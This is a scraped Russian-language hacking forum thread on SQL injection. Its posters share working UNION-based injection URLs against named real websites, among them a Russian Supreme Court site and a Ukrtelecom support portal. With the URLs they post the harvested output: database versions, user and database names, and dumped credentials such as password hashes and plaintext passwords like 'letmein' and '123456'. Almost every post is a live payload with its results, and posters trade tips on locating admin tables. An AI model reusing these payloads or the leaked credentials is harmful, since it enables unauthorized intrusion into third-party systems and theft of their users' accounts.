SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    emagiC CMS.Net 4.0
     
    1 person likes this.
  2. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://[COLOR=Lime]www.lovestory.name[/COLOR]/?porno_video=-1+union+select+1,2,version(),user()/*
    [email protected] 5.0.45-log Mb
    Code:
    http://[COLOR=Lime]www.gaylovespirit.org[/COLOR]/workshops_es.php?cat=1&wid=-1'+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7/*
    [email protected]:4.0.27:DB200335
    Code:
    http://[COLOR=Lime]www.loveandrespect.com[/COLOR]/content/article.php?aid=1+or+1=@@version--
    'Microsoft SQL Server 2000
    Code:
    http://[COLOR=Lime]masterboat.ru[/COLOR]/index.php?D=3&id=-1+union+select+1,version(),3,4,5,user(),7,8,9,10,11,12,13,14/*&file=catalog&content=short_info
    4.0.27 [email protected]
    Code:
    http://[COLOR=Lime]www.idmaster.co.uk[/COLOR]/idm_order.php?card_id=-1+union+select+1,version(),3,4,5,6,7,8/*
    4.1.22-standard
    Code:
    http://[COLOR=Lime]www.gifts.master-board.ru[/COLOR]/mes.php?id=-1+union+select+1,2,3,database(),5,version(),7,user(),9,10/*
    5.0.45-Max-log [email protected] mboardb7_mb
    Code:
    http://[COLOR=Lime]blog.pmaster.net[/COLOR]/post.php?id=-1+union+select+1,version(),3,4,5,user(),7,8,9,database(),11/*
    4.1.22-log pmaste_blog@localhost pmaste_pmblog
    Code:
    http://[COLOR=Lime]www.immaster.net[/COLOR]/news_page.php?pag=&id=-1+union+select+1,2,version(),user(),5,6,database(),8,9/*
    5.0.45-Dotdeb_0.dotdeb.1-log webulesti@localhost imm
    Code:
    http://[COLOR=Lime]www.immaster.net[/COLOR]/news_page.php?pag=&id=-1+union+select+1,2,user,password,5,6,7,8,9+from+mysql.user+limit+0,1/*
    stud:52099bc10ef4f64c
    root:0889eae004418834
    omegas:75da24625a4cfb48
     
    7 people like this.
  3. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Code:
    http://www.infoelekt.com/public/product_detail.php?id=-1262+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
    Code:
    http://www.medsys.ru/index.phtml?mm=quest&sm=faq&ctype=15&cdir=-1+union+select+1,version(),user(),database(),5/*
     
    1 person likes this.
  4. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Никак не могу найти пассы...
    Code:
    http://[COLOR=Olive]www.allianceforbiz.com[/COLOR]/events/specific_event.php?id=-89+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9/*
    alliance_shows@localhost/alliance_Show2005be/4.1.22-standard
     
    1 person likes this.
  5. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    emagiC CMS.Net 4.0
     
    1 person likes this.
  6. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Code:
    http://[COLOR=Olive]www.gesmer.com[/COLOR]/publications/article.php?ID=-172+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8/*  
    oslegal@localhost/GU2/4.0.20
    Code:
    http://[COLOR=Olive]www.gesmer.com[/COLOR]/publications/article.php?ID=-172+union+select+1,password,3,4,5,user,7,8+from+mysql.user+limit+0,1/*
    root:032c41e8435273a7:letmein
    Code:
    http://[COLOR=Olive]www.gesmer.com[/COLOR]/publications/article.php?ID=-172+union+select+1,password,3,4,5,user,7,8+from+mysql.user+limit+1,5/*  
    oslegal:7c9fbfb223888670:
     
    1 person likes this.
  7. JIyka

    JIyka Member

    Joined:
    31 Oct 2007
    Messages:
    11
    Likes Received:
    9
    Reputations:
    5
    Access denied for user 'hweight'@'205.196.208.0/255.255.240.0' to database 'informati

    http://www.honoluluweekly.com/cover/detail.php?id=-1+union+select+1,-1+union+select+1,column_name,3,4,5,6+from+information_schema.columns+where+table_name=CHAR(0x72,0x77,0x64,0x5F,0x75,0x73,0x65,0x72,0x73)/*

    [email protected]
     
  8. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    aifrostov.ru
    Code:
    http://www.aifrostov.ru/index.php?sec=rubr&id_st=-1227'+union+select+1,2,3,4,concat_ws(char(58),version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16+from+news+--+
    4.1.22:AIFROSTOV@LOCALHOST:AIFROSTOV

    interstar.ua
    Code:
    http://www.interstar.ua/internet/index.php?id=-684+union+select+concat_ws(char(58),cast(table_name+as+binary))+from+information_schema.tables+limit+274,1+--+&main_menu=3
    5.0.18-Max:webadmin@localhost:IStarmobile

    seo-maker.ru
    Code:
    http://seo-maker.ru/news_out3.php?id=38392+union+select+1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7+--+
    4.1.20-log:a1777_3@localhost:a1777_3

    baltportal.ru
    Code:
    http://baltportal.ru/index.php?type=500&idNews=-9490+union+select+1,2,concat_ws(char(58),version(),user(),database()),4,table_name,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+
    5.0.45-community-log:nwlove_baltru@localhost:nwlove_baltru
     
    1 person likes this.
  9. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    http://support.kharkiv.ukrtelecom.ua/
    Code:
    http://support.kharkiv.[COLOR=DarkGreen]ukrtelecom.ua[/COLOR]/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,current_database()||chr(58)||version()||chr(58)||current_user,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
    Общая информация:
    support:postgreSQL 7.3.18 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5):reader
    ==========================================
    Code:
    http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,usename||chr(58)||passwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_user--
    Выбераем пользователей с "паролями":
    pgsql:********
    postgres:********
    reader:********
    writer:********
    ===========================================
    Code:
    http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,usename,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_user+where+usesuper=true--
    Выбераем привилегированных пользователей:
    postgres

    к сожелению вытащить пароль из pg_shadow не получится, мы работаем от пользователя ридер(
    ==========================================
    Code:
    http://support.kharkiv.ukrtelecom.ua/news/?id=1+unIon+SelEcT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,datname,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_database--
    выбираем существующии базы:
    balakleya
    bogoduhiv
    callcenter
    chuguyiv
    cit
    dergachi
    forum
    Gallery
    games
    izum
    kalendar
    krasnograd
    kupyansk
    lozova
    mtz
    news
    opros
    orderdsl
    Phone
    pool
    postgres
    radio
    rayon
    sc
    support
    template0
    template1
    vodolaga
    vovchansk
     
    4 people like this.
  10. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Code:
    http://[COLOR=Olive]surcon.ru[/COLOR]/pages.php?id=-18+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5/*
    [email protected]/vodos68_surcon/
    4.0.25-standard
    Code:
    http://[COLOR=Olive]surcon.ru[/COLOR]/pages.php?id=-18+union+select+1,concat_ws(0x3a,login,mail,password),3,4,5+from+users+limit+0,15/*  
    admin:123456
     
    1 person likes this.
  11. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Народ к сожалению я нечего непонимаю в SQL Inj, но что мне делать вот такой ссылкой
    http://192.168.99.8/modules.php?name=News&topic_id=3&pagenum='
     
    1 person likes this.
  12. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://metalistfans.net/news.php?id=-939UNION%20SELECT%201,2,3,4,5,6,7,8,9/*
    таблиц не нашёл ( КТо найдёт отпишитесь плз

    HTML:
    http://www.golodomor.org.ua/speech.php?id=-1562+UNION+SELECT+1,concat(user,0x3a,pass),3+From+users/*
     
    #3552 KEHT33, 5 Nov 2007
    Last edited: 5 Nov 2007
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    2KEHT33
    Code:
    http://metalistfans.net/news.php?id=-939UNION%20SELECT%201,2,3,name,5,6,7,8,9%20from%20forum/*
    а таблицы с админами там может и не быть вобще...
    ЗЫ как видно имена таблиц идут без префикса, хотя не факт

    еще там есть табличка teams
     
  14. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    ну вот тут с префиксом и тоже не нашёл )
    HTML:
    http://soft.tomck.com/reiting.php?link=47+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
     
    2 people like this.
  15. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Код:

    http://skr.su/?div=zakony&id=-111+union+select+1,2,3,4,5,6,7,8,9,10,concat(login,0x3a,pass),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+users+limit+0,1/*

    не понял что за пароли такие :(
     
    2 people like this.
  16. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Code:
    http://[COLOR=Olive]ivanpro.org[/COLOR]/top_menu.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18/*  
    ivanproorg@localhost/ivanproorg/5.0.22-Debian_2-log
    Code:
    http://[COLOR=Olive]ivanpro.org[/COLOR]/top_menu.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,admin_login,admin_pass,admin_mail),9,10,11,12,13,14,15,16,17,18+from+auto_ws_admin_option+limit+0,1/*  
    admin:pass:www.websmith.ru
    Админку не нашёл...
     
    2 people like this.
  17. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Tonikk:120853239:2e4b6dc525afb5cb
    Alla2:asdf
    Rahashan:poiu:1
    Lavel:asdf:0
    Vesta:aszx:0
    users>username>password>accesslevel
    test:test:0
     
    3 people like this.
  18. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Верховный суд РФ

    Code:
    http://www.supcourt.ru/courts_m.php?b=-2005)+union+select+aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71)+from+mysql.user/*
    работает на винде
    мускул 5-ветки
    пароли и логины пользователей БД по линку на странице
    (их 3)


    вот вывод всех таблиц и колонок:
    Code:
    http://www.supcourt.ru/courts_m.php?b=-2005)+union+select+aes_decrypt(aes_encrypt(concat(table_name,0x3a,column_name),0x71),0x71)+from+information_schema.columns/*
    (сначала линки неправильные дал, из браузера скопировал неправильно, сейчас исправил, линки рабочие)
     
    #3558 Scipio, 5 Nov 2007
    Last edited: 5 Nov 2007
    3 people like this.
  19. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    Code:
    http://www.rotary.or.id/v20/news/detail.php?all=1&id=-1+union+select+1,2,version(),user(),5,database(),7,8,9
    Округ 3400 Индонезии

    Version: 4.1.20-log
    User: [email protected]
    Database: tsantoso_project

    Бла, как ни старался подобрать таблицы - никак...
     
    5 people like this.
  20. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    tomsknews.com
    Code:
    http://tomsknews.com/news/?id=-4128)+union+select+concat_ws(char(58),version(),user(),database())+--+
    4.1.22-log:wttomsknews@localhost:wttomsknews

    foodmedia.ru
    Code:
    http://www.foodmedia.ru/?space=5&article=-3912+union+select+concat_ws(char(58),version(),user(),database())+--+
    4.1.22:food3@localhost:food-media

    Code:
    http://www.foodmedia.ru/?space=5&article=-3912+union+select+concat_ws(char(58),username,user_password,user_icq)+from+phpbb_users+limit+1,1+--+
    admin:f6fdffe48c908deb0f4c3bd36c032e72:adminadmin
     
    4 people like this.
Thread Status:
Not open for further replies.